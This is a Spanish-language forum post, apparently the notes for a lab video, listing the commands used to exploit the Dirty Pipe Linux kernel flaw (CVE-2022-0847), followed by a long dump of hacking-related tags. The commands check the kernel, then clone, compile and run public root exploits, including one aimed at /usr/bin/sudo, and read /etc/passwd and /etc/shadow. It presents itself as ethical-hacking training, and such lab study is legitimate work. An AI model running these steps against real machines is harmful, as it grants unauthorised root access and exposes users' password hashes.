Links o ENLACES
https://github.com/AlexisAhmed/CVE-2022 ... e-Exploits
https://github.com/basharkey/CVE-2022-0 ... pe-checker
COMANDOS QUE YO USE
Código: Seleccionar todo
cat /etc/*release
uname -r
git clone https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
chmod +x dpipe.sh
./dpipe.sh
Confirmamos que estamos en precencia de un usuario razo
Comandos
para ver que soy un usuario razo
id
para ver el grupo al que uno pertenece este usuario razo
groups test
-----------
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
sudo apt-get install gcc
chmod +x compile.sh
./compile.sh
./exploit-1
para tener prompt
/bin/bash -i
ls -la /etc/passwd
cat /etc/passwd
cat /etc/shadow
./exploit-2 /usr/bin/sudo
VIDEO TUTORIAL del LABORATORIO
Pentesting Security Technologies Nmap Sistema operativo Operating Systems Instalación y configuración Install and configure ssh Metasploit Unauthenticated LAN Remote Code Execution Reverse connection Shell Telnet networking Handshake backdoor LAN | Local Area Network CMD execution How to Exploit and Test this Critical Vulnerability Netcat Listener Exploit Code NC NetCat GitHub Firewall Pentest Lab Setup Laboratorio de Trabajo Security Ethical Hacking Certification Guide OWASP ZAP Debian Red Hat Terminal python blue team red team Windows Bug Actualizar update parchear Operating System mfsconsole vulnerabilidades de seguridad detección de intrusos Networking Linux Ubuntu MacOS PowerPoint Access Hash cifrado descrifrar instalacion install PowerShell Step-by-Step Download o bajar database apache base de datos Vulnerabilidades CVE Perl SQL Injection Exploitation Explanation Burp suite Command Injection php Bypass All Security proxy VULNERABILITIES parrot Escalar privilegios en Linux Apache Nginx Routing redes hogareñas Soho Server and Client in Python Localhost binaries certificates certificados OSI Model Modelo TCP/IP VPN Como ser ROOT linux exploit linux privilege escalation linux hack linux priv esc priv escalation linux dirty pipe linux dirty pipe cve linux vulnerability linux security linux kernel linux kernel vulnerablity Ethical Hacker,Penetration Tester,Cybersecurity Consultant,learn security,unix,OSINT,oscp certification,try hack me,hacking,ctf for beginners,ehtical hacking,cyber seguridad,security,tool,linux for ethical hackers,capacitacion,educacion,How Hackers Do It,cyber security,tutorial,Information Systems Security Professional,comandos,commands,remote function,laboratorio,lab,testing,servidor,como escalar privilegios en windows o linux,kernel vulnerable,kernel con bug